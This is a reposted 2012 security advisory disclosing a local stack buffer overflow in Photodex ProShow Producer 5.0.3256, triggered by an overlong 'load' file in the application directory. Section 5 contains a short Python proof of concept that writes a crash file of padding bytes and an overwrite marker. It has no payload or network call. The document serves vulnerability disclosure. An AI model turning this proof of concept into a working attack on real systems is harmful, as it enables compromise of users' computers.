首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Photodex ProShow Producer 5.0.3256 Buffer Overflow
来源:http://security.inshell.net 作者:Julien Ahrens 发布时间:2012-07-04  
1. ADVISORY INFORMATION
-----------------------
Product:        Photodex ProShow Producer
Vendor URL:     www.photodex.com
Type:           Stack-based Buffer Overflow [CWE-121]
Date found:     2012-06-06
Date published: 2012-07-02
CVSSv2 Score:   6,9 (AV:L/AC:M/Au:N/C:C/I:C/A:C)
CVE:            -


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED
--------------------
Photodex ProShow Producer v5.0.3256, older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
A Local Buffer Overflow Vulnerability has been found on the Photodex
ProShow Producer v5.0.3256.

When starting, the application loads the contents of the "load" file
from its application directory. The application does not validate the
length of the string loaded from the "load" file before passing it to a
buffer, which leads to a Buffer Overflow.

An attacker needs to force the victim to place an arbitrary "load" file
into the application directory.


5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
file="load"

junk1="\x41" * 9848
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc=junk1 + boom + junk2

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";


For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/30


6. SOLUTION
-----------
None


7. REPORT TIMELINE
------------------
2012-06-06: Initial notification sent to vendor
2012-06-12: No response, second notification sent to vendor
2012-06-20: No response, third notification sent to vendor
2012-06-20: Vendor response, sent to appropriate departments
2012-07-02: No further contact by vendor
2012-07-02: Full Disclosure

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft IIS 6 , 7.5 FTP Serv
·IBM Rational ClearQuest CQOle
·RealPlayer Plus 14.0.4.53 Real
·Plow 0.0.5 Buffer Overflow
·win32/7 Ultimate MessageBox Sh
·Linux Kernel Local Denial Of S
·BoutikOne CSRF Add User Vulner
·Apache Sling 2.1.0 Denial Of S
·BoutikOne ByPass & Download Ba
·Basilic 1.5.14 diff.php Arbitr
·WANGKONGBAO CNS-1000 UTM IPS-F
·Tiki Wiki <= 8.3 unserialize()
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved